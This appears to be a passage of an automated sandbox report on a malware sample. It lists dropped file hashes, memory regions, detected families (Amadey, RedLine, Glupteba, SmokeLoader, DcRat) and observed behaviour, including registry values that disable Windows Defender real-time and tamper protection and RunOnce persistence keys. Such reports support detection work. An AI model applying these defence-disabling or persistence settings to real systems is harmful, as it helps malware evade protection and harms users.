SHA1 e63187eee539b1223df538aa47ceab3982a67629
SHA256 22d30268ef8f67d26dca98a65ff0cf130adca4a7c9ac6c47c0f3aa39e61f8227
SHA512 fd3fd39379c0ffed4b503a8d7f7a18bd5cbfbc2c92a35fdef70290319ba0c01ac6ba67ff8e3615239b3d8b1f806b05c6f12f8089ccb67606d5e2ec385d0a87e7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 526a71f6c88d3fdf1fe8464267aa6738
SHA1 c5858078574d3dc098f27451bdad2bff58831ebd
SHA256 4fea47251aece0732a240efbc0e115a7ad79051435693fe1daa5b77a37166ae0
SHA512 1020998c185fee6e6473f3520ff09506ec38f356c4dc099d4ff447246241f5733f2ecada9cd5030712aedd329e30465266545d62a23a91530d049d674945119c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a0c4cf4bb680fc92ddcc7de51c6ce43a
SHA1 ad7d5debc5266c9c836a54e1dd037b92871f7b69
SHA256 5168f9697fa684feea3dff22554aa6a310663b0b4eecb2b5a870e6b39c2dad75
SHA512 e99871031449f602a90ff0bb6ed27a3120b7abf2488ebdc7d9395d592bebb38eeb67f4ca3cb762457b77e082a38f17ed8e50df69f571262c7e3059721a5af38c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5a46e6ee06b5f63b4f880e59fc373574
SHA1 630b107e3e6ab6a60471ac5ccc495c915006ed6f
SHA256 78944c53244e3f7429e2d1447ceb88c2cda973a2e5a7739d9081e5c8e49514cc
SHA512 cac7230c85ea38fec18227bd91ac045b03f0fc81bcdcfedcb6e242b282863d963c9f8d01c51dd6dd78204e36df2ea3b7c412acf9be07cd5a6d3f3dd9bfdd59f1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8c634b6cb7ee314f1da2d9b89fb4a19b
SHA1 edb588283415d0b0469c978a188c12b28aaf1c89
SHA256 2287cd551e004426b249f7dd2470ddb7443d3eb92f5d3cd685605e196193cbf4
SHA512 58b5d8ad858c1eac91abf055e7c35c0b0b3712e7de9e2b3dbb106f4ff0bcf70f4d7c2cecdcd4175f34671db7845597002d33e3aa96d7dc1420b1cefd8f5f78f8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2ca5753bed1888b0241b975bedfaf4e4
SHA1 df17d3ca2457e9a6917263d64a14c376b23dd18a
SHA256 08db974a81e617540cd38de8f8deb1f071ca1f068094eda593deb6679d60f0a7
SHA512 10d393b105bb1e2a813e732ec2e25a102927178f7a533dac4ae5c7fef7bd69a7cefc9723c9c67245cca5c73f078cede7f05165259c537a2a88a891b9be428a2f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f38267a11cf754f59c6b221effa3043c
SHA1 27e373457e1e1d0e6070af7e1389bafa928ac3ab
SHA256 cb31eefa0d3981fefd873654b8efed1242365c71a46a5ce8ceb82c1872645d42
SHA512 f78abbf68bcd13ac8d244f0990f9e6d7bf3cd4a9dbb91f33d304bacf42b7b8238a0f085fa19dd1b16fb9b2cd6d290fcd662d9e15cd0a7f5c1223381ddecd7d9b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 70c40f7aa532b0ed3f882473736b10f5
SHA1 02e941991a0e7fe4c73704b4bf95fa5fc25db262
SHA256 e95adc46a75ee7a567c17d6708cbbe583757eda0444388c27efaf13edb56cdf6
SHA512 7f74a97df6da9d60d8ed145f0742c2b1e7e259ec4f11fe21f5456e573913d11af661343b571c44c29e2244fdda1ec6543d722f696ecd1310dd40aacba6a3f87e

memory/736-845-0x000007FEF57A0000-0x000007FEF618C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CE8B.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

C:\Users\Admin\AppData\Local\Temp\CE8B.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

memory/2616-944-0x0000000000CD0000-0x0000000001BFA000-memory.dmp

memory/2616-945-0x00000000705A0000-0x0000000070C8E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

memory/1560-972-0x00000000705A0000-0x0000000070C8E000-memory.dmp

memory/1624-975-0x00000000023F0000-0x00000000024F0000-memory.dmp

memory/1560-971-0x0000000000240000-0x0000000000756000-memory.dmp

memory/2828-977-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1624-978-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2828-980-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2828-981-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2616-983-0x00000000705A0000-0x0000000070C8E000-memory.dmp

memory/2596-984-0x00000000041D0000-0x00000000045C8000-memory.dmp

memory/2596-985-0x00000000041D0000-0x00000000045C8000-memory.dmp

memory/2596-986-0x00000000045D0000-0x0000000004EBB000-memory.dmp

memory/2596-987-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1560-988-0x0000000005250000-0x0000000005290000-memory.dmp

memory/1560-989-0x0000000000790000-0x0000000000791000-memory.dmp

memory/1560-990-0x00000000705A0000-0x0000000070C8E000-memory.dmp

memory/2828-993-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1184-992-0x0000000003960000-0x0000000003976000-memory.dmp

memory/2596-991-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2596-998-0x00000000041D0000-0x00000000045C8000-memory.dmp

memory/472-997-0x0000000003F10000-0x0000000004308000-memory.dmp

memory/2596-999-0x00000000045D0000-0x0000000004EBB000-memory.dmp

memory/472-1001-0x0000000004310000-0x0000000004BFB000-memory.dmp

memory/472-1000-0x0000000003F10000-0x0000000004308000-memory.dmp

memory/472-1002-0x0000000000400000-0x000000000266D000-memory.dmp

memory/472-1008-0x0000000000400000-0x000000000266D000-memory.dmp

memory/472-1009-0x0000000003F10000-0x0000000004308000-memory.dmp

memory/2348-1010-0x0000000003ED0000-0x00000000042C8000-memory.dmp

memory/1560-1011-0x0000000005250000-0x0000000005290000-memory.dmp

memory/2348-1012-0x0000000003ED0000-0x00000000042C8000-memory.dmp

memory/2160-1013-0x000000013FFD0000-0x0000000140571000-memory.dmp

memory/2348-1014-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2000-1018-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2000-1027-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/1560-1031-0x0000000000830000-0x000000000084C000-memory.dmp

memory/1560-1032-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1560-1033-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1560-1035-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1560-1039-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1560-1041-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1560-1043-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1560-1037-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1560-1045-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1560-1047-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1560-1054-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1560-1066-0x0000000000830000-0x0000000000845000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\11A4.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

memory/1560-1070-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1804-1073-0x0000000000230000-0x000000000028A000-memory.dmp

memory/1804-1074-0x0000000000400000-0x000000000046F000-memory.dmp

memory/1560-1072-0x0000000000830000-0x0000000000845000-memory.dmp

memory/1804-1078-0x00000000705A0000-0x0000000070C8E000-memory.dmp

memory/1560-1079-0x0000000000A50000-0x0000000000A51000-memory.dmp

memory/1804-1088-0x00000000070A0000-0x00000000070E0000-memory.dmp

memory/1792-1089-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1792-1092-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1792-1094-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1792-1096-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1792-1098-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1792-1100-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1792-1102-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1792-1123-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1560-1133-0x00000000705A0000-0x0000000070C8E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1BA4.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

memory/2596-1146-0x0000000000020000-0x000000000003E000-memory.dmp

memory/2348-1147-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2596-1148-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2596-1149-0x00000000705A0000-0x0000000070C8E000-memory.dmp

memory/2188-1154-0x0000000000F60000-0x0000000000F7E000-memory.dmp

memory/2188-1166-0x00000000705A0000-0x0000000070C8E000-memory.dmp

memory/2188-1167-0x00000000047B0000-0x00000000047F0000-memory.dmp

memory/1804-1169-0x00000000705A0000-0x0000000070C8E000-memory.dmp

memory/1804-1173-0x00000000070A0000-0x00000000070E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3A54.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp3A79.tmp

MD5 5f358a4b656915069dae00d3580004a1
SHA1 c81e8b6f220818370d47464210c07f0148e36049
SHA256 8917aa7c60dc0d81231fb4be80a0d7b0e934ea298fb486c4bad66ef77bebcf5a
SHA512 d63ebd45d31f596a5c8f4fcc816359a24cbf2d060cb6e6a7648abaf14dc7cf76dda3721c9d19cb7e84eaeb113a3ee1f7be44b743f929de05c66da49c7ba7e97d

memory/1792-1234-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2188-1275-0x00000000705A0000-0x0000000070C8E000-memory.dmp

memory/2188-1276-0x00000000047B0000-0x00000000047F0000-memory.dmp

memory/1804-1278-0x00000000705A0000-0x0000000070C8E000-memory.dmp

memory/2392-1284-0x000000001B070000-0x000000001B352000-memory.dmp

memory/2392-1286-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

memory/2392-1285-0x00000000024A0000-0x00000000024A8000-memory.dmp

memory/2392-1287-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

memory/2392-1289-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2392-1290-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2392-1288-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2392-1291-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2392-1292-0x000007FEF4C60000-0x000007FEF55FD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\58N5K0A81E921N7KI51K.temp

MD5 37339d72620fa7ce77bda60bc5553dde
SHA1 e93cee039d7ed567523f32321e3276e97423c97c
SHA256 95c4afcf412ac9e52b3d99d4d647a77e7abc977f5a0bb4c4800e5b223ff25595
SHA512 b916e178ee74210efdb8b7ab0310dc559b3b9d0bd5ac8ee8aec74503558c2b3d199c75e70c42fa68aab31d833eec78ca125e139d824a68b3c6537dc0a2f1b0b7

memory/2148-1300-0x000007FEF4C90000-0x000007FEF562D000-memory.dmp

memory/2148-1301-0x0000000002470000-0x00000000024F0000-memory.dmp

memory/2148-1299-0x0000000002450000-0x0000000002458000-memory.dmp

memory/2148-1298-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

memory/2148-1302-0x000007FEF4C90000-0x000007FEF562D000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HCMMLZVL\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:02

Reported

2023-10-10 20:06

Platform

win10v2004-20230915-en

Max time kernel

49s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dab934a6e60ae099a284735854432e977c0779d6b00a6b72f6d955cfce327a5f.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\BDA7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\BDA7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\BDA7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\BDA7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\BDA7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\BDA7.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\B96F.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BFF9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10B.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\BDA7.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\B611.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OV6MR7Yw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bf6Dw9Ui.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\fZ8WR0am.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bt4xT1rz.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
